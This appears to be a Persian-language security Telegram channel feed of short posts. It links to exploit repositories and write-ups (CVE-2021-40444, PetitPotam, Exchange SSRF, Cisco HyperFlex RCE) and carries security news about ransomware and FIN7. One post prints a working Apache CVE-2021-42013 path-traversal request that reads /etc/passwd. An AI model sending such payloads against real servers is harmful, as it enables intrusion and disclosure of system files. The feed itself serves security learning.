اکسپلویت آسیب پذیری word با شناسه ی CVE-2021-40444


https://github.com/lockedbyte/CVE-2021-40444


#office
#windows
#rce


@sec_nerd

مقاله ی قدیمی در خصوص آبجکت های نهان در داکیومنت های آفیس برای اهداف کلاینتی


https://www.securify.nl/blog/click-me-if-you-can-office-social-engineering-with-embedded-objects


#office
#spear_phishing


@sec_nerd

PetitPotam – NTLM Relay to AD CS


https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/


#windows
#pentest
#AD


@sec_nerd

چطور هتل را با تلفن همراهم هک کردم؟


https://medium.com/geekculture/how-i-hacked-a-hotel-just-using-my-phone-97f4d2de39ca



@sec_nerd

جایزه ی ۵ هزار دلاری برای کشف آسیب پذیری IDOR در گوگل

https://asterfiester.medium.com/5000-google-idor-vulnerability-writeup-c7b45926abe9



#writeup
#bugbounty
#idor


@sec_nerd

file upload mindmap


#web
#pentest

@sec_nerd

دور زدن صفحه ی ۴۰۳ و دستیابی به ادمین

https://sapt.iss.onedium.com/bypassing-403-protection-to-get-pagespeed-admin-access-822fab64c0b3



#web
#pentest
#bugbounty



@sec_nerd

استفاده از SSRF و رسیدن به میل باکس در اکسچنج پیش از احراز هویت


https://vanshal.medium.com/pre-auth-ssrf-to-full-mailbox-access-microsoft-exchange-server-exploit-a62c8ac04b47



#exchange
#ssrf


@sec_nerd

[Apache] HTTP Server cgi-bin Path Traversal and RCE (CVE-2021-42013)

This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)

GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1



#apache
#rce


@sec_nerd

وزارت خزانه داری امریکا اعلام کرد از سال ۲۰۱۹ تا کنون حدود 5.2 میلیارد دلار باج از طریق ارزهای دیجیتال به گونه های مختلف باج افزار پرداخت شده است

https://therecord.media/treasury-said-it-tied-5-2-billion-in-btc-transactions-to-ransomware-payments/


#news
#ransomware



@sec_nerd

فرماندار میسوری خواستار محاکمه ی خبرنگاری شد که سورس صفحه ی یک سایت حکومتی را مشاهده کرده بود!

این خبرنگار با بررسی سورس صفحه متوجه شد کدملی معلمان و مدیران مدارس در آن وجود دارد و این موضوع را به مسئولان ایالتی اطلاع داد.

حالا فرماندار این خبرنگار را هکر خوانده و درخواست محاکمه ی وی را دارد!


https://www.vice.com/en/article/jg8ynp/governor-wants-to-prosecute-journalist-who-clicked-view-source-on-government-site


#news
#lol
#usa
#f12

@sec_nerd

شرکت Kape Technologies که با نام crossrider نیز فعالیت داشته و پیش از این بدافزار منتشر میکرده است اکنون مالک سرویس های vpn معروفی مانند Expressvpn و cyberghost و Pia و zenmate است!

یک مامور سابق واحد ۸۲۰۰ اطلاعات اسراییل (معادل nsa) با نام Koby Menachemi بنیانگذار آن بوده و حتی سایتهای مقایسه ی سرویس های vpn مانند vpnmentor و wizcase نیز متعلق به آنهاست!

https://restoreprivacy.com/kape-technologies-owns-expressvpn-cyberghost-pia-zenmate-vpn-review-sites/


#vpn
#israel
#news


@sec_nerd

بنابر اخبار منتشر شده، گروه هکرهای FIN7 که در زمینه اقتصادی بسیار گسترده عمل کرده و شرکت های پوششی متعددی را در سطح جهان ایجاد کرده بودند شرکتی دیگر با نام bastion secure دارند که در زمینه ی امنیت سایبری فعالیت میکند و در پس پرده اقدام به بکارگیری برنامه نویسان حرفه ای برای ایجاد باج افزار خود میکنند!

این گروه تاکنون نزدیک به یک میلیارد دلار درآمد داشته است.

در لینک منبع میتوانید تصاویر آگهی های استخدام آنها را ببینید:
https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html


#news
#fin7
#ransomware


@sec_nerd

Ultimate Guide To Android SSL Pinning Bypass


#ebook
#android

@sec_nerd

پست بلاگ orange tsai در خصوص آسیب پذیری های کشف شده ی اخیر در exchange

https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html

https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html

https://blog.orange.tw/2021/08/proxyshell-a-new-attack-surface-on-ms-exchange-part-3.html

#microsoft
#exchange
#proxylogon
#proxyshell


@sec_nerd

شرحی بر نحوه ی کشف باگ RCE در فرم لاگین Cisco Hyperflex

https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/


#cisco
#rce


@sec_nerd

ما رو دستکم نگیر


#twitter


@sec_nerd